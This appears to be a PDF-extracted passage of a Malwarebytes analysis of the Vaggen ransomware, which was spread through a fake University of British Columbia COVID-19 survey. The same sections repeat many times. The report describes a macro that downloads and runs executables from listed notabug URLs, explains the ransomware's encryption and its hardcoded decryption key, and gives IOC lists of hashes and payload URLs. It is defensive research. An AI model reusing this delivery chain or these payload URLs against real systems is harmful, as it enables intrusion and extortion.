main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2255 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2256 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2257 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2258 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2259 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2260 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2261 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2262 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2263 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2264 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2265 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2266 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2267 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2268 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2269 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2270 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2271 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2272 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2273 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2274 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2275 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2276 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2277 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2278 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2279 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2280 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2281 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2282 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2283 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2284 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2285 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2286 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2287 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2288 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2289 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2290 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2291 of 